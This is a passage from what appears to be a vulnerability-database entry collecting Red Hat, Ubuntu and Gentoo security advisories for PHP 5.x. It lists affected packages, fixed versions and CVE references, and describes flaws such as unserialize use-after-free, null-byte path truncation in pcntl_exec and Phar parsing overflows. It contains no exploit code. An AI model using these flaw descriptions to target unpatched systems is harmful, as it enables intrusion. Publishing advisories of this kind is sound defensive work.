x86_64: php-5.4.16-36.el7_1.x86_64.rpm php-cli-5.4.16-36.el7_1.x86_64.rpm php-common-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-gd-5.4.16-36.el7_1.x86_64.rpm php-ldap-5.4.16-36.el7_1.x86_64.rpm php-mysql-5.4.16-36.el7_1.x86_64.rpm php-odbc-5.4.16-36.el7_1.x86_64.rpm php-pdo-5.4.16-36.el7_1.x86_64.rpm php-pgsql-5.4.16-36.el7_1.x86_64.rpm php-process-5.4.16-36.el7_1.x86_64.rpm php-recode-5.4.16-36.el7_1.x86_64.rpm php-soap-5.4.16-36.el7_1.x86_64.rpm php-xml-5.4.16-36.el7_1.x86_64.rpm php-xmlrpc-5.4.16-36.el7_1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: php-5.4.16-36.ael7b_1.src.rpm
ppc64le: php-5.4.16-36.ael7b_1.ppc64le.rpm php-cli-5.4.16-36.ael7b_1.ppc64le.rpm php-common-5.4.16-36.ael7b_1.ppc64le.rpm php-debuginfo-5.4.16-36.ael7b_1.ppc64le.rpm php-gd-5.4.16-36.ael7b_1.ppc64le.rpm php-ldap-5.4.16-36.ael7b_1.ppc64le.rpm php-mysql-5.4.16-36.ael7b_1.ppc64le.rpm php-odbc-5.4.16-36.ael7b_1.ppc64le.rpm php-pdo-5.4.16-36.ael7b_1.ppc64le.rpm php-pgsql-5.4.16-36.ael7b_1.ppc64le.rpm php-process-5.4.16-36.ael7b_1.ppc64le.rpm php-recode-5.4.16-36.ael7b_1.ppc64le.rpm php-soap-5.4.16-36.ael7b_1.ppc64le.rpm php-xml-5.4.16-36.ael7b_1.ppc64le.rpm php-xmlrpc-5.4.16-36.ael7b_1.ppc64le.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: php-bcmath-5.4.16-36.el7_1.ppc64.rpm php-dba-5.4.16-36.el7_1.ppc64.rpm php-debuginfo-5.4.16-36.el7_1.ppc64.rpm php-devel-5.4.16-36.el7_1.ppc64.rpm php-embedded-5.4.16-36.el7_1.ppc64.rpm php-enchant-5.4.16-36.el7_1.ppc64.rpm php-fpm-5.4.16-36.el7_1.ppc64.rpm php-intl-5.4.16-36.el7_1.ppc64.rpm php-mbstring-5.4.16-36.el7_1.ppc64.rpm php-mysqlnd-5.4.16-36.el7_1.ppc64.rpm php-pspell-5.4.16-36.el7_1.ppc64.rpm php-snmp-5.4.16-36.el7_1.ppc64.rpm
s390x: php-bcmath-5.4.16-36.el7_1.s390x.rpm php-dba-5.4.16-36.el7_1.s390x.rpm php-debuginfo-5.4.16-36.el7_1.s390x.rpm php-devel-5.4.16-36.el7_1.s390x.rpm php-embedded-5.4.16-36.el7_1.s390x.rpm php-enchant-5.4.16-36.el7_1.s390x.rpm php-fpm-5.4.16-36.el7_1.s390x.rpm php-intl-5.4.16-36.el7_1.s390x.rpm php-mbstring-5.4.16-36.el7_1.s390x.rpm php-mysqlnd-5.4.16-36.el7_1.s390x.rpm php-pspell-5.4.16-36.el7_1.s390x.rpm php-snmp-5.4.16-36.el7_1.s390x.rpm
x86_64: php-bcmath-5.4.16-36.el7_1.x86_64.rpm php-dba-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-devel-5.4.16-36.el7_1.x86_64.rpm php-embedded-5.4.16-36.el7_1.x86_64.rpm php-enchant-5.4.16-36.el7_1.x86_64.rpm php-fpm-5.4.16-36.el7_1.x86_64.rpm php-intl-5.4.16-36.el7_1.x86_64.rpm php-mbstring-5.4.16-36.el7_1.x86_64.rpm php-mysqlnd-5.4.16-36.el7_1.x86_64.rpm php-pspell-5.4.16-36.el7_1.x86_64.rpm php-snmp-5.4.16-36.el7_1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64le: php-bcmath-5.4.16-36.ael7b_1.ppc64le.rpm php-dba-5.4.16-36.ael7b_1.ppc64le.rpm php-debuginfo-5.4.16-36.ael7b_1.ppc64le.rpm php-devel-5.4.16-36.ael7b_1.ppc64le.rpm php-embedded-5.4.16-36.ael7b_1.ppc64le.rpm php-enchant-5.4.16-36.ael7b_1.ppc64le.rpm php-fpm-5.4.16-36.ael7b_1.ppc64le.rpm php-intl-5.4.16-36.ael7b_1.ppc64le.rpm php-mbstring-5.4.16-36.ael7b_1.ppc64le.rpm php-mysqlnd-5.4.16-36.ael7b_1.ppc64le.rpm php-pspell-5.4.16-36.ael7b_1.ppc64le.rpm php-snmp-5.4.16-36.ael7b_1.ppc64le.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: php-5.4.16-36.el7_1.src.rpm
x86_64: php-5.4.16-36.el7_1.x86_64.rpm php-cli-5.4.16-36.el7_1.x86_64.rpm php-common-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-gd-5.4.16-36.el7_1.x86_64.rpm php-ldap-5.4.16-36.el7_1.x86_64.rpm php-mysql-5.4.16-36.el7_1.x86_64.rpm php-odbc-5.4.16-36.el7_1.x86_64.rpm php-pdo-5.4.16-36.el7_1.x86_64.rpm php-pgsql-5.4.16-36.el7_1.x86_64.rpm php-process-5.4.16-36.el7_1.x86_64.rpm php-recode-5.4.16-36.el7_1.x86_64.rpm php-soap-5.4.16-36.el7_1.x86_64.rpm php-xml-5.4.16-36.el7_1.x86_64.rpm php-xmlrpc-5.4.16-36.el7_1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: php-bcmath-5.4.16-36.el7_1.x86_64.rpm php-dba-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-devel-5.4.16-36.el7_1.x86_64.rpm php-embedded-5.4.16-36.el7_1.x86_64.rpm php-enchant-5.4.16-36.el7_1.x86_64.rpm php-fpm-5.4.16-36.el7_1.x86_64.rpm php-intl-5.4.16-36.el7_1.x86_64.rpm php-mbstring-5.4.16-36.el7_1.x86_64.rpm php-mysqlnd-5.4.16-36.el7_1.x86_64.rpm php-pspell-5.4.16-36.el7_1.x86_64.rpm php-snmp-5.4.16-36.el7_1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2014-8142 https://access.redhat.com/security/cve/CVE-2014-9652 https://access.redhat.com/security/cve/CVE-2014-9705 https://access.redhat.com/security/cve/CVE-2014-9709 https://access.redhat.com/security/cve/CVE-2015-0231 https://access.redhat.com/security/cve/CVE-2015-0232 https://access.redhat.com/security/cve/CVE-2015-0273 https://access.redhat.com/security/cve/CVE-2015-2301 https://access.redhat.com/security/cve/CVE-2015-2348 https://access.redhat.com/security/cve/CVE-2015-2783 https://access.redhat.com/security/cve/CVE-2015-2787 https://access.redhat.com/security/cve/CVE-2015-3307 https://access.redhat.com/security/cve/CVE-2015-3329 https://access.redhat.com/security/cve/CVE-2015-3330 https://access.redhat.com/security/cve/CVE-2015-3411 https://access.redhat.com/security/cve/CVE-2015-3412 https://access.redhat.com/security/cve/CVE-2015-4021 https://access.redhat.com/security/cve/CVE-2015-4022 https://access.redhat.com/security/cve/CVE-2015-4024 https://access.redhat.com/security/cve/CVE-2015-4025 https://access.redhat.com/security/cve/CVE-2015-4026 https://access.redhat.com/security/cve/CVE-2015-4147 https://access.redhat.com/security/cve/CVE-2015-4148 https://access.redhat.com/security/cve/CVE-2015-4598 https://access.redhat.com/security/cve/CVE-2015-4599 https://access.redhat.com/security/cve/CVE-2015-4600 https://access.redhat.com/security/cve/CVE-2015-4601 https://access.redhat.com/security/cve/CVE-2015-4602 https://access.redhat.com/security/cve/CVE-2015-4603 https://access.redhat.com/security/cve/CVE-2015-4604 https://access.redhat.com/security/cve/CVE-2015-4605 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
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-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ============================================================================ Ubuntu Security Notice USN-2658-1 July 06, 2015
php5 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 15.04
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in PHP.
Software Description: - php5: HTML-embedded scripting language interpreter
Details:
Neal Poole and Tomas Hoger discovered that PHP incorrectly handled NULL bytes in file paths. (CVE-2015-3411, CVE-2015-3412, CVE-2015-4025, CVE-2015-4026, CVE-2015-4598)
Emmanuel Law discovered that the PHP phar extension incorrectly handled filenames starting with a NULL byte. (CVE-2015-4021)
Max Spelsberg discovered that PHP incorrectly handled the LIST command when connecting to remote FTP servers. (CVE-2015-4022, CVE-2015-4643)
Shusheng Liu discovered that PHP incorrectly handled certain malformed form data. (CVE-2015-4024)
Andrea Palazzo discovered that the PHP Soap client incorrectly validated data types. (CVE-2015-4147)
Andrea Palazzo discovered that the PHP Soap client incorrectly validated that the uri property is a string. A remote attacker could possibly use these issues to obtain sensitive information or cause a denial of service. This issue only affected Ubuntu 15.04. (CVE-2015-4644)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 15.04: libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.2 php5-cgi 5.6.4+dfsg-4ubuntu6.2 php5-cli 5.6.4+dfsg-4ubuntu6.2 php5-fpm 5.6.4+dfsg-4ubuntu6.2
Ubuntu 14.10: libapache2-mod-php5 5.5.12+dfsg-2ubuntu4.6 php5-cgi 5.5.12+dfsg-2ubuntu4.6 php5-cli 5.5.12+dfsg-2ubuntu4.6 php5-fpm 5.5.12+dfsg-2ubuntu4.6
Ubuntu 14.04 LTS: libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.11 php5-cgi 5.5.9+dfsg-1ubuntu4.11 php5-cli 5.5.9+dfsg-1ubuntu4.11 php5-fpm 5.5.9+dfsg-1ubuntu4.11
Ubuntu 12.04 LTS: libapache2-mod-php5 5.3.10-1ubuntu3.19 php5-cgi 5.3.10-1ubuntu3.19 php5-cli 5.3.10-1ubuntu3.19 php5-fpm 5.3.10-1ubuntu3.19
In general, a standard system update will make all the necessary changes. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201606-10
https://security.gentoo.org/
Severity: Normal Title: PHP: Multiple vulnerabilities Date: June 19, 2016 Bugs: #537586, #541098, #544186, #544330, #546872, #549538, #552408, #555576, #555830, #556952, #559612, #562882, #571254, #573892, #577376 ID: 201606-10
Synopsis
Multiple vulnerabilities have been found in PHP, the worst of which could lead to arbitrary code execution, or cause a Denial of Service condition.
Background
PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. Please review the CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All PHP 5.4 users should upgrade to the latest 5.5 stable branch, as PHP 5.4 is now masked in Portage:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev=lang/php-5.5.33"
All PHP 5.5 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev=lang/php-5.5.33"
All PHP 5.6 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev=lang/php-5.6.19"
References
[ 1 ] CVE-2013-6501 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6501 [ 2 ] CVE-2014-9705 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9705 [ 3 ] CVE-2014-9709 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9709 [ 4 ] CVE-2015-0231 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0231 [ 5 ] CVE-2015-0273 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0273 [ 6 ] CVE-2015-1351 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1351 [ 7 ] CVE-2015-1352 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1352 [ 8 ] CVE-2015-2301 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2301 [ 9 ] CVE-2015-2348 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2348 [ 10 ] CVE-2015-2783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2783 [ 11 ] CVE-2015-2787 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2787 [ 12 ] CVE-2015-3329 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3329 [ 13 ] CVE-2015-3330 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3330 [ 14 ] CVE-2015-4021 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4021 [ 15 ] CVE-2015-4022 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4022 [ 16 ] CVE-2015-4025 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4025 [ 17 ] CVE-2015-4026 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4026 [ 18 ] CVE-2015-4147 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4147 [ 19 ] CVE-2015-4148 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4148 [ 20 ] CVE-2015-4642 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4642 [ 21 ] CVE-2015-4643 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4643 [ 22 ] CVE-2015-4644 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4644 [ 23 ] CVE-2015-6831 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6831 [ 24 ] CVE-2015-6832 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6832 [ 25 ] CVE-2015-6833 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6833 [ 26 ] CVE-2015-6834 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6834 [ 27 ] CVE-2015-6835 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6835 [ 28 ] CVE-2015-6836 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6836 [ 29 ] CVE-2015-6837 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6837 [ 30 ] CVE-2015-6838 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6838 [ 31 ] CVE-2015-7803 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7803 [ 32 ] CVE-2015-7804 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7804
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201606-10
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
Show details on source website{
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"data": "The pcntl_exec implementation in PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 truncates a pathname upon encountering a \\x00 character, which might allow remote attackers to bypass intended extension restrictions and execute files with unexpected names via a crafted first argument. NOTE: this vulnerability exists because of an incomplete fix for CVE-2006-7243. Supplementary information : CWE Vulnerability type by CWE-19: Data Handling ( Data processing ) Has been identified. PHP is prone to a security-bypass vulnerability. \nAn attacker can leverage this issue to bypass security restrictions and perform unauthorized actions. This may aid in further attacks. PHP (PHP: Hypertext Preprocessor, PHP: Hypertext Preprocessor) is an open source general-purpose computer scripting language jointly maintained by the PHP Group and the open source community. The language is mainly used for Web development and supports a variety of databases and operating systems. A security vulnerability exists in PHP\u0027s implementation of pcntl_exec, which stems from the fact that the program does not allow null bytes in pathnames. The following versions are affected: PHP prior to 5.4.41, 5.5.x prior to 5.5.25, and 5.6.x prior to 5.6.9. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: php security and bug fix update\nAdvisory ID: RHSA-2015:1135-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-1135.html\nIssue date: 2015-06-23\nCVE Names: CVE-2014-8142 CVE-2014-9652 CVE-2014-9705 \n CVE-2014-9709 CVE-2015-0231 CVE-2015-0232 \n CVE-2015-0273 CVE-2015-2301 CVE-2015-2348 \n CVE-2015-2783 CVE-2015-2787 CVE-2015-3307 \n CVE-2015-3329 CVE-2015-3330 CVE-2015-3411 \n CVE-2015-3412 CVE-2015-4021 CVE-2015-4022 \n CVE-2015-4024 CVE-2015-4025 CVE-2015-4026 \n CVE-2015-4147 CVE-2015-4148 CVE-2015-4598 \n CVE-2015-4599 CVE-2015-4600 CVE-2015-4601 \n CVE-2015-4602 CVE-2015-4603 CVE-2015-4604 \n CVE-2015-4605 \n=====================================================================\n\n1. Summary:\n\nUpdated php packages that fix multiple security issues and several bugs\nare now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server. \n\nA flaw was found in the way the PHP module for the Apache httpd web server\nhandled pipelined requests. A remote attacker could use this flaw to\ntrigger the execution of a PHP script in a deinitialized interpreter,\ncausing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn uninitialized pointer use flaw was found in PHP\u0027s Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application. \n(CVE-2015-0232)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP\u0027s FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2014-8142, CVE-2015-0231, CVE-2015-0273,\nCVE-2015-2787, CVE-2015-4147, CVE-2015-4148, CVE-2015-4599, CVE-2015-4600,\nCVE-2015-4601, CVE-2015-4602, CVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. (CVE-2015-2348, CVE-2015-4025, CVE-2015-4026,\nCVE-2015-3411, CVE-2015-3412, CVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP\u0027s Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2301,\nCVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nMultiple flaws were found in PHP\u0027s File Information (fileinfo) extension. \nA remote attacker could cause a PHP application to crash if it used\nfileinfo to identify type of attacker supplied files. (CVE-2014-9652,\nCVE-2015-4604, CVE-2015-4605)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP\u0027s enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash. \n(CVE-2014-9705)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd\nextension. A specially crafted GIF file could cause a PHP application using\nthe imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nThis update also fixes the following bugs:\n\n* The libgmp library in some cases terminated unexpectedly with a\nsegmentation fault when being used with other libraries that use the GMP\nmemory management. With this update, PHP no longer changes libgmp memory\nallocators, which prevents the described crash from occurring. (BZ#1212305)\n\n* When using the Open Database Connectivity (ODBC) API, the PHP process\nin some cases terminated unexpectedly with a segmentation fault. The\nunderlying code has been adjusted to prevent this crash. (BZ#1212299)\n\n* Previously, running PHP on a big-endian system sometimes led to memory\ncorruption in the fileinfo module. This update adjusts the behavior of\nthe PHP pointer so that it can be freed without causing memory corruption. \n(BZ#1212298)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1175718 - CVE-2014-8142 php: use after free vulnerability in unserialize()\n1185397 - CVE-2015-0231 php: use after free vulnerability in unserialize() (incomplete fix of CVE-2014-8142)\n1185472 - CVE-2015-0232 php: Free called on unitialized pointer in exif.c\n1188599 - CVE-2014-9652 file: out of bounds read in mconvert()\n1188639 - CVE-2014-9709 gd: buffer read overflow in gd_gif_in.c\n1194730 - CVE-2015-0273 php: use after free vulnerability in unserialize() with DateTimeZone\n1194737 - CVE-2014-9705 php: heap buffer overflow in enchant_broker_request_dict()\n1194747 - CVE-2015-2301 php: use after free in phar_object.c\n1204868 - CVE-2015-4147 php: SoapClient\u0027s __call() type confusion through unserialize()\n1207676 - CVE-2015-2787 php: use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re\n1207682 - CVE-2015-2348 php: move_uploaded_file() NUL byte injection in file name\n1213394 - CVE-2015-3330 php: pipelined request executed in deinitialized interpreter under httpd 2.4\n1213407 - CVE-2015-3411 php: missing null byte checks for paths in various PHP extensions\n1213442 - CVE-2015-4604 CVE-2015-4605 php: denial of service when processing a crafted file with Fileinfo\n1213446 - CVE-2015-2783 php: buffer over-read in Phar metadata parsing\n1213449 - CVE-2015-3329 php: buffer overflow in phar_set_inode()\n1222485 - CVE-2015-4024 php: multipart/form-data request paring CPU usage DoS\n1222538 - CVE-2015-4599 CVE-2015-4600 CVE-2015-4601 php: type confusion issue in unserialize() with various SOAP methods\n1223408 - CVE-2015-4025 php: CVE-2006-7243 regressions in 5.4+\n1223412 - CVE-2015-4022 php: integer overflow leading to heap overflow when reading FTP file listing\n1223422 - CVE-2015-4026 php: pcntl_exec() accepts paths with NUL character\n1223425 - CVE-2015-4021 php: memory corruption in phar_parse_tarfile caused by empty entry file name\n1223441 - CVE-2015-3307 php: invalid pointer free() in phar_tar_process_metadata()\n1226916 - CVE-2015-4148 php: SoapClient\u0027s do_soap_call() type confusion after unserialize()\n1232823 - CVE-2015-3412 php: missing null byte checks for paths in various PHP extensions\n1232897 - CVE-2015-4598 php: missing null byte checks for paths in DOM and GD extensions\n1232918 - CVE-2015-4603 php: exception::getTraceAsString type confusion issue after unserialize\n1232923 - CVE-2015-4602 php: Incomplete Class unserialization type confusion\n\n6. Package List:\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nSource:\nphp-5.4.16-36.el7_1.src.rpm\n\nx86_64:\nphp-5.4.16-36.el7_1.x86_64.rpm\nphp-bcmath-5.4.16-36.el7_1.x86_64.rpm\nphp-cli-5.4.16-36.el7_1.x86_64.rpm\nphp-common-5.4.16-36.el7_1.x86_64.rpm\nphp-dba-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-devel-5.4.16-36.el7_1.x86_64.rpm\nphp-embedded-5.4.16-36.el7_1.x86_64.rpm\nphp-enchant-5.4.16-36.el7_1.x86_64.rpm\nphp-fpm-5.4.16-36.el7_1.x86_64.rpm\nphp-gd-5.4.16-36.el7_1.x86_64.rpm\nphp-intl-5.4.16-36.el7_1.x86_64.rpm\nphp-ldap-5.4.16-36.el7_1.x86_64.rpm\nphp-mbstring-5.4.16-36.el7_1.x86_64.rpm\nphp-mysql-5.4.16-36.el7_1.x86_64.rpm\nphp-mysqlnd-5.4.16-36.el7_1.x86_64.rpm\nphp-odbc-5.4.16-36.el7_1.x86_64.rpm\nphp-pdo-5.4.16-36.el7_1.x86_64.rpm\nphp-pgsql-5.4.16-36.el7_1.x86_64.rpm\nphp-process-5.4.16-36.el7_1.x86_64.rpm\nphp-pspell-5.4.16-36.el7_1.x86_64.rpm\nphp-recode-5.4.16-36.el7_1.x86_64.rpm\nphp-snmp-5.4.16-36.el7_1.x86_64.rpm\nphp-soap-5.4.16-36.el7_1.x86_64.rpm\nphp-xml-5.4.16-36.el7_1.x86_64.rpm\nphp-xmlrpc-5.4.16-36.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nSource:\nphp-5.4.16-36.el7_1.src.rpm\n\nx86_64:\nphp-5.4.16-36.el7_1.x86_64.rpm\nphp-bcmath-5.4.16-36.el7_1.x86_64.rpm\nphp-cli-5.4.16-36.el7_1.x86_64.rpm\nphp-common-5.4.16-36.el7_1.x86_64.rpm\nphp-dba-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-devel-5.4.16-36.el7_1.x86_64.rpm\nphp-embedded-5.4.16-36.el7_1.x86_64.rpm\nphp-enchant-5.4.16-36.el7_1.x86_64.rpm\nphp-fpm-5.4.16-36.el7_1.x86_64.rpm\nphp-gd-5.4.16-36.el7_1.x86_64.rpm\nphp-intl-5.4.16-36.el7_1.x86_64.rpm\nphp-ldap-5.4.16-36.el7_1.x86_64.rpm\nphp-mbstring-5.4.16-36.el7_1.x86_64.rpm\nphp-mysql-5.4.16-36.el7_1.x86_64.rpm\nphp-mysqlnd-5.4.16-36.el7_1.x86_64.rpm\nphp-odbc-5.4.16-36.el7_1.x86_64.rpm\nphp-pdo-5.4.16-36.el7_1.x86_64.rpm\nphp-pgsql-5.4.16-36.el7_1.x86_64.rpm\nphp-process-5.4.16-36.el7_1.x86_64.rpm\nphp-pspell-5.4.16-36.el7_1.x86_64.rpm\nphp-recode-5.4.16-36.el7_1.x86_64.rpm\nphp-snmp-5.4.16-36.el7_1.x86_64.rpm\nphp-soap-5.4.16-36.el7_1.x86_64.rpm\nphp-xml-5.4.16-36.el7_1.x86_64.rpm\nphp-xmlrpc-5.4.16-36.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nphp-5.4.16-36.el7_1.src.rpm\n\nppc64:\nphp-5.4.16-36.el7_1.ppc64.rpm\nphp-cli-5.4.16-36.el7_1.ppc64.rpm\nphp-common-5.4.16-36.el7_1.ppc64.rpm\nphp-debuginfo-5.4.16-36.el7_1.ppc64.rpm\nphp-gd-5.4.16-36.el7_1.ppc64.rpm\nphp-ldap-5.4.16-36.el7_1.ppc64.rpm\nphp-mysql-5.4.16-36.el7_1.ppc64.rpm\nphp-odbc-5.4.16-36.el7_1.ppc64.rpm\nphp-pdo-5.4.16-36.el7_1.ppc64.rpm\nphp-pgsql-5.4.16-36.el7_1.ppc64.rpm\nphp-process-5.4.16-36.el7_1.ppc64.rpm\nphp-recode-5.4.16-36.el7_1.ppc64.rpm\nphp-soap-5.4.16-36.el7_1.ppc64.rpm\nphp-xml-5.4.16-36.el7_1.ppc64.rpm\nphp-xmlrpc-5.4.16-36.el7_1.ppc64.rpm\n\ns390x:\nphp-5.4.16-36.el7_1.s390x.rpm\nphp-cli-5.4.16-36.el7_1.s390x.rpm\nphp-common-5.4.16-36.el7_1.s390x.rpm\nphp-debuginfo-5.4.16-36.el7_1.s390x.rpm\nphp-gd-5.4.16-36.el7_1.s390x.rpm\nphp-ldap-5.4.16-36.el7_1.s390x.rpm\nphp-mysql-5.4.16-36.el7_1.s390x.rpm\nphp-odbc-5.4.16-36.el7_1.s390x.rpm\nphp-pdo-5.4.16-36.el7_1.s390x.rpm\nphp-pgsql-5.4.16-36.el7_1.s390x.rpm\nphp-process-5.4.16-36.el7_1.s390x.rpm\nphp-recode-5.4.16-36.el7_1.s390x.rpm\nphp-soap-5.4.16-36.el7_1.s390x.rpm\nphp-xml-5.4.16-36.el7_1.s390x.rpm\nphp-xmlrpc-5.4.16-36.el7_1.s390x.rpm\n\nx86_64:\nphp-5.4.16-36.el7_1.x86_64.rpm\nphp-cli-5.4.16-36.el7_1.x86_64.rpm\nphp-common-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-gd-5.4.16-36.el7_1.x86_64.rpm\nphp-ldap-5.4.16-36.el7_1.x86_64.rpm\nphp-mysql-5.4.16-36.el7_1.x86_64.rpm\nphp-odbc-5.4.16-36.el7_1.x86_64.rpm\nphp-pdo-5.4.16-36.el7_1.x86_64.rpm\nphp-pgsql-5.4.16-36.el7_1.x86_64.rpm\nphp-process-5.4.16-36.el7_1.x86_64.rpm\nphp-recode-5.4.16-36.el7_1.x86_64.rpm\nphp-soap-5.4.16-36.el7_1.x86_64.rpm\nphp-xml-5.4.16-36.el7_1.x86_64.rpm\nphp-xmlrpc-5.4.16-36.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 